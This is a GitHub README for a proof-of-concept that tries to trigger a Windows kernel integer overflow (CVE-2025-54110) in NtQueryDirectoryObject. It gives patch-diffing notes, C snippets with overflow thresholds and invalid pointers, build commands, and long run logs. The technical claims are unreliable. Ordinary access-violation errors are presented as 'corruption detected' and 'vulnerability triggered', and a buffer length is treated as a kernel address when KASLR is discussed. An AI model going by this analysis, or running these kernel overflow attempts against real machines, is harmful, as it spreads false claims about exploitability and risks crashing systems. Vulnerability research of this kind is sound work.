# CVE-2025-54110-Kernel-EoP-PoC
PoC implementation for CVE-2025-54110 a Kernel-Level Integer Overflow Vulnerability in the Windows `NtQueryDirectoryObject` system call.

### CVE-2025-54110 - Windows Kernel Integer Overflow Analysis

**CVE:** https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110

This repository contains a **Crash-Only PoC** for CVE-2025-54110 Kernel EoP Vulnerability, developed solely for **security research, reverse engineering and exploit development research**. This code is intended to demonstrate vulnerability research techniques including:

- Binary diffing with Ghidra Version Tracking
- Windows Patch Tuesday analysis
- Kernel vulnerability research methodologies
- Structured Exception Handling (SEH) behavior analysis

This PoC does NOT achieve privilege escalation or reliable BSOD. It is designed to safely trigger access violations that are caught by Windows kernel protections.

---

## Overview

### CVE-2025-54110: Windows Kernel EoP Vulnerability

**Publication Date:** September 2025 (Windows Tuesday Security Patch)

| Property | Value |
|----------|-------|
| **CWE** | CWE-190: Integer Overflow or Wraparound |
| **CVSS 3.1 Score** | 8.8 (High) / 7.7 (Temporal) |
| **Vector String** | `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C` |
| **Attack Vector** | Local |
| **Attack Complexity** | Low |
| **Privileges Required** | Low |
| **User Interaction** | None |
| **Scope** | Changed |
| **Confidentiality** | High |
| **Integrity** | High |
| **Availability** | High |
| **Exploit Maturity** | Unproven |

### Executive Summary

An integer overflow vulnerability in the Windows Kernel allows an authenticated attacker to potentially elevate privileges locally. According to Microsoft's advisory:

> *"An attacker could exploit this vulnerability by sending specially crafted input from a sandboxed user-mode process to trigger an integer overflow, resulting in a buffer overflow in the kernel and enabling privilege escalation or sandbox escape."*

### Potential Impact

- **SYSTEM privileges** could be gained by a successful attacker
- Sandbox escape from user-mode restricted processes
- Kernel memory corruption leading to code execution

### Exploitability Assessment

- **Publicly Disclosed:** No
- **Exploited in the Wild:** No
- **Microsoft Assessment:** Exploitation More Likely

---

## Research Methodology

### 1. Patch Analysis Workflow

```
Windows Update Files from Aug 2025 & Sep 2025 (KB.msu)
    ↓
Extract CAB Files
    ↓
Calculate SHA-256 Hashes (August vs September)
    ↓
Identify Changed Files
    ↓
Ghidra Version Tracking Analysis
    ↓
Setting Symbol Servers to Clarify Function Names
    ↓
Function-Level Diff Comparison
```

### 2. Files Analyzed

Initial analysis focused on two primary kernel components:

#### win32k.sys (-)
- **Result:** No significant changes detected
- **Score Range:** 0.97-1.0 (high similarity)
- **Conclusion:** Not the vulnerable component for CVE-2025-54110

#### ntoskrnl.exe (+)
- **Result:** Multiple functions with significant changes
- **Score Range:** Functions with scores ≤0.951
- **Length Differences:** Source vs Destination byte length variations detected
- **Total Items Exported:** 2,036 functions for analysis

### 3. Ghidra Version Tracking Results

Sample of identified changes in `ntoskrnl.exe`:

| Score | Confidence | Source Length | Dest Length | Source Function | Dest Function |
|-------|------------|---------------|-------------|-----------------|---------------|
| 0.951 | 2.618 | 1023 | 365 | FUN_1403146d0 | FUN_1403a4ea0 |
| 0.950 | 2.285 | 113 | 203 | FUN_140680810 | FUN_1406d952c |
| 0.950 | 3.137 | 782 | 1050 | FUN_14032106c | FUN_140303a38 |
| 0.951 | 2.675 | 141 | 171 | FUN_140407bd0 | FUN_140a172a0 |
| 0.951 | 2.660 | 346 | 150 | FUN_140610e60 | FUN_1406115d4 |

---

## PoC Statement

### Technical Approach

The PoC (`precise_overflow_bsod.c`) attempts to trigger the integer overflow vulnerability through:

1. **Precise Threshold Calculation:** `0xfffffdbc` (derived from base=0x20, name=0x200)
2. **NtQueryDirectoryObject API:** Target function for triggering overflow
3. **Multi-phase Attack Strategy:**
   - Phase 1: Precision integer overflow attempts
   - Phase 2: Kernel memory targeting
   - Phase 3: Multi-threaded exploitation

### Code Structure

```c
// Key threshold values calculated for overflow
ULONG precise_thresholds[] = {
    0xfffffdbc,  // Precise threshold - base=0x20, name=0x200
    0xfffffdbb,  // Threshold - 1
    0xfffffdbd,  // Threshold + 1
    0xfffffdba,  // Threshold - 2  
    0xfffffdbe,  // Threshold + 2
};

// Buffer configurations to test edge cases
PVOID buffer_types[] = {
    VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE),  // Normal buffer
    VirtualAlloc(NULL, 0x10, MEM_COMMIT, PAGE_READWRITE),    // Small buffer
    NULL,                                                    // NULL pointer
    (PVOID)0x4141414141414141,                              // Invalid pointer
    (PVOID)0x0000000000000000,                              // Zero address
};
```

### Exploitation Vectors Tested

```
NtQueryDirectoryObject() Parameters:
├── DirectoryHandle: \BaseNamedObjects, \KernelObjects, etc.
├── Buffer: Various pointer configurations
├── BufferLength: Calculated overflow thresholds (0xfffffdbc variants)
├── ReturnSingleEntry: TRUE/FALSE variations
├── RestartScan: TRUE/FALSE variations
└── Context: Controlled iteration state
```

---

## Why the PoC Doesn't Crash the System

### Actual Results

The PoC consistently returns `STATUS_ACCESS_VIOLATION (0xC0000005)` without causing a Blue Screen of Death (BSOD). This is **by design** and demonstrates several critical Windows kernel security mechanisms:

### 1. Structured Exception Handling (SEH)

```
User-Mode Input → NtQueryDirectoryObject
                        ↓
                  ProbeForRead/Write
                        ↓
                  __try { ... }
                        ↓
              Access Violation Detected
                        ↓
                  __except { ... }
                        ↓
            Return STATUS_ACCESS_VIOLATION
```

**Why it works:**
- Windows kernel syscalls wrap user-mode pointer access in exception handlers
- Invalid memory accesses are **caught** rather than allowed to propagate
- System returns error code to caller instead of crashing

### 2. SMAP (Supervisor Mode Access Prevention)

Modern CPU feature that prevents kernel mode (Ring 0) from accessing user-mode (Ring 3) memory without explicit authorization:

```
Kernel attempts to access user pointer
        ↓
SMAP checks permission (STAC/CLAC instructions)
        ↓
Unauthorized access detected
        ↓
CPU generates #PF (Page Fault)
        ↓
Caught by kernel exception handler
```

**Impact on PoC:**
- Even if overflow occurs, direct kernel-to-user memory access is blocked
- Prevents exploitation of pointer dereference vulnerabilities

### 3. KASLR (Kernel Address Space Layout Randomization)

```
Boot Time: Kernel Base = Random Address
                ↓
Hardcoded PoC address (0xfffffdbc)
                ↓
        Does NOT match actual kernel structures
                ↓
    Write to non-critical memory OR caught by SEH
```

**Why BSOD doesn't occur:**
- PoC uses static addresses/thresholds
- Real kernel structures are at randomized locations
- Writes miss critical targets (e.g., EPROCESS, Pool Headers)

### 4. Kernel Pool Integrity Checks

Windows 10+ implements enhanced pool corruption detection:

```
Heap/Pool Allocation
    ↓
Header Contains:
├── Magic Values
├── Size Information
└── Checksums
    ↓
On Free/Access:
    Validate Integrity
    ↓
Corruption Detected?
    ↓
[YES] → Safe Exception → Return Error
[NO]  → Proceed Normally
```

---

## PoC Execution Output Analysis

### Expected Output

See the `STATUS_ACCESS_VIOLATION (0xC0000005)`, then its ok.

```
C:\Users\reLab\Desktop\cve>.\poc64.exe
==================================================
    CVE-2025-54110 - Kernel Integer Overflow PoC
==================================================
[!] WARNING: This code may crash the system (BSOD).
[?] Do you want to continue? (y/n): y

[>] Targeting directory: \BaseNamedObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...

[>] Targeting directory: \KernelObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...

[>] Targeting directory: \Sessions
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...

[>] Targeting directory: \Windows
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...

[-] Exploit finished. If the system is still running, the attack may have been mitigated.

C:\Users\reLab\Desktop\cve>
```
<img width="717" height="658" alt="image" src="https://github.com/user-attachments/assets/9cce72f3-3bbe-4b17-8055-563cfbb3b48a" />

### Verbossed Experiment

```
C:\Users\reLab\Desktop\cve>.\poc64_verbose11.exe
======================================================
CVE-2025-54110 PRECISION INTEGER OVERFLOW BSOD EXPLOIT
Threshold: 0xfffffdbc (base=0x20, name=0x200)
!!! WARNING: HIGH PROBABILITY OF SYSTEM CRASH !!!
======================================================

[+] Current user: desktop-lfkkhu2\relab
[+] Current PID: 1444

[!] THIS EXPLOIT HAS HIGH CHANCE OF CAUSING BSOD!
[!] Continue? (y/n): y
[+] NT functions initialized successfully
[+] Using precise threshold: 0xfffffdbc

[+] Exploiting all directories with precise threshold...

[+] Precision exploiting: \BaseNamedObjects
[*] Phase 1: Precision overflow
[+] Starting precise integer overflow exploitation...
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=1, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=2, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=0, restart=0
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=0, restart=1
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=1, restart=0
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=3, single=1, restart=1
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=4, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
...
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[*] Phase 2: Kernel memory targeting
[+] Targeting kernel memory with precise threshold...
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBC: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBB: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[!] Kernel memory corruption with threshold 0xFFFFFDBD: 0xC0000005
[*] Phase 3: Multi-threaded BSOD
[+] Triggering precision BSOD with calculated threshold...
[+] Starting precise integer overflow exploitation...
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBC, buffer=0, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
...
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=0, restart=0
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=0, restart=1
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=1, restart=0
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=3, single=1, restart=1
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=0, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=0, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=0
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision attempt: threshold=0xFFFFFDBE, buffer=4, single=1, restart=1
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBE, status=0xC0000005
[!] Precision overflow successful!
[+] Starting multi-threaded precision attack...
```

### Observed Behavior

```
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBB, status=0xC0000005
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBD, status=0xC0000005
```

**Status Code:** `0xC0000005` = `STATUS_ACCESS_VIOLATION`

### What This Means

| Aspect | Interpretation |
|--------|----------------|
| **Vulnerability Confirmation** | (+) Code path reaches vulnerable function |
| **Input Validation** | (!) Crafted input triggers abnormal behavior |
| **System Stability** | (+) SEH prevents crash; system remains stable |
| **DoS Achievement** | (-) No BSOD; exception handling successful |
| **EoP Achievement** | (-) No privilege escalation; controlled failure |

### Success Criteria by Objective

```
┌─────────────────────────────────────────────────────────┐
│ Objective               │ Status │ Explanation          │
├─────────────────────────────────────────────────────────┤
│ Vulnerability Research  │   +    │ Behavior change      │
│                         │        │ confirmed            │
├─────────────────────────────────────────────────────────┤
│ Learning Experience     │   +    │ Kernel protections   │
│                         │        │ demonstrated         │
├─────────────────────────────────────────────────────────┤
│ Crash (DoS/BSOD)       │   -    │ SEH prevented crash  │
├─────────────────────────────────────────────────────────┤
│ Privilege Escalation    │   -    │ No code execution    │
│                         │        │ achieved             │
└─────────────────────────────────────────────────────────┘
```

---

## Educational Value

### What This PoC Demonstrates

#### Outcomes

1. **Patch Diffing Methodology**
   - Comparing pre/post-patch binaries using Ghidra
   - Identifying modified functions through version tracking
   - Analyzing score-based similarity metrics

2. **Windows Kernel Architecture**
   - Understanding syscall flow (`NtQueryDirectoryObject`)
   - Recognizing kernel/user-mode boundaries
   - Learning NTAPI internal functions

3. **Security Mechanism Behavior**
   - SEH in action: exception caught vs. system crash
   - SMAP preventing unauthorized memory access
   - KASLR defeating static address exploitation

4. **Vulnerability Research Process**
   - CVE analysis and information gathering
   - Reverse engineering binary changes
   - Hypothesis testing through controlled exploitation attempts

#### Limitations

1. **Modern Kernel Protections are Effective**
   - Simple overflow attempts are insufficient
   - Multiple layers of defense must be bypassed
   - Static analysis alone cannot predict exploitability

2. **Gap Between Theory and Practice**
   - Integer overflow exists (theoretical)
   - Practical exploitation requires:
     - Information disclosure (leak kernel addresses)
     - Heap shaping/Feng Shui
     - ROP chains or other code execution primitives
     - Bypassing DEP, CFG, HVCI, etc.

---

## Priority Functions for Analysis

Based on CVE-2025-54110 characteristics (Integer Overflow → Buffer Overflow in Kernel), prioritize reviewing functions in the exported CSV that handle:

### High Priority Categories

```yaml
Integer/Size Calculations:
  - Functions with arithmetic operations on buffer sizes
  - Length calculation before allocation
  - Checked vs. unchecked math operations
  
Buffer/Memory Operations:
  - memcpy, memmove, RtlCopyMemory variants
  - ExAllocatePool* family
  - Buffer size validation routines
  
Object Directory Handling:
  - NtQueryDirectoryObject and related helpers
  - ObpLookupDirectoryEntry
  - Object enumeration functions
  
User-Mode Interface:
  - ProbeForRead/Write wrappers
  - Input validation functions
  - IOCTL handlers
```

### Filtering Strategy for 2,036 Functions

**Step 1: Score-Based Filter**
```
Score ≤ 0.951 AND (SourceLen ≠ DestLen)
```

**Step 2: Keyword Search**
```
Function names containing:
- "Directory", "Object", "Query"
- "Buffer", "Length", "Size"
- "Allocate", "Copy", "Validate"
- "Integer", "Overflow", "Wrap"
```

**Step 3: Cross-Reference Analysis**
```
Functions called by NtQueryDirectoryObject:
  ObQueryNameString
  ObpEnumerateDirectory
  [Related helper functions]
```

**Step 4: Change Magnitude**
```
Prioritize functions with:
- Length difference > 100 bytes
- Confidence score 2.0-3.5 (moderate changes)
```

---

## Building and Running

### Prerequisites

```
- Windows 10/11 (x64)
- Visual Studio 2019+ or MinGW-w64
- Administrator privileges (for syscall access)
```

### Compilation

```bash
# on x64 Native Tools CLI for VS 20xx

# Using Visual Studio
cl.exe /Fe:poc64.exe precise_overflow_bsod.c ntdll.lib

# or
cl poc.c /link /SUBSYSTEM:CONSOLE
```

```bash
# Using MinGW
gcc precise_overflow_bsod.c -o poc64.exe -lntdll
```

### Execution

```powershell
# Run with admin privileges
.\poc64.exe
```

**Expected Output:**
```
[+] Current user: DESKTOP-XXXXXXX\user
[+] Current PID: 1234
[!] THIS EXPLOIT HAS HIGH CHANCE OF CAUSING BSOD!
[!] Continue? (y/n): y
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[+] System is still running - protections may be active.
```

---

## Resources & References

### Official Sources

- [Microsoft Security Advisory - CVE-2025-54110](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110)
- [CWE-190: Integer Overflow or Wraparound](https://cwe.mitre.org/data/definitions/190.html)
- [Windows Kernel Internals - Microsoft Docs](https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/)

### Research Tools

- [Ghidra - NSA Software Reverse Engineering Suite](https://ghidra-sre.org/)
- [WinDbg - Windows Debugging Tools](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/)

### Related Reading

- [Kernel Exploit Development](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/)
- [Windows Kernel Exploitation](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver)
- [Patch Diffing with Ghidra](https://www.youtube.com/watch?v=K83T7iVla5s)

---

## Legal Disclaimer

This code is provided for EDUCATIONAL PURPOSES ONLY.

DO NOT use this code for:

• Unauthorized access to computer systems

• Malicious attacks or damage

• Any illegal activities


The author assumes NO responsibility for misuse.
Users must comply with all applicable laws.

**By using this code, you acknowledge:**

1. You have authorization to test on target systems
2. You understand the legal implications in your jurisdiction
3. You accept full responsibility for your actions
4. This is for learning, not malicious activity

---

This repository is maintained for educational purposes.

**Not Applied Any of Following:**
- Weaponized exploit code
- Bypass techniques for production systems
- Unethical hacking instructions

---

## Contact

For legitimate security research inquiries or educational collaboration:

**Responsible Disclosure:**
- Security issues with this PoC → Open a GitHub Issue
- Real CVE-2025-54110 exploitation → Report to [MSRC](https://msrc.microsoft.com/)

---

## License

```
MIT License - See LICENSE file for details

Educational software provided "as is" without warranty.
Use at your own risk.
```
